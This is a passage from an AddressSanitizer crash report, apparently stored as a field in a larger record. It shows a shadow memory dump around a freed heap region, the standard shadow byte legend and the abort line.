01 fa fa fa fd fa fa fa fd fa fa fa fd fa\n=&gt;0x0c047ffff630: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n  0x0c047ffff640: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n  0x0c047ffff650: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n  0x0c047ffff660: fa fa 02 fa fa fa 06 fa fa fa 07 fa fa fa 02 fa\n  0x0c047ffff670: fa fa fd fa fa fa 06 fa fa fa 02 fa fa fa fd fa\n  0x0c047ffff680: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n  Shadow gap:              cc\n==25706==ABORTING", "creation_timestamp": "2026-06-13T13:00:31.000000Z"}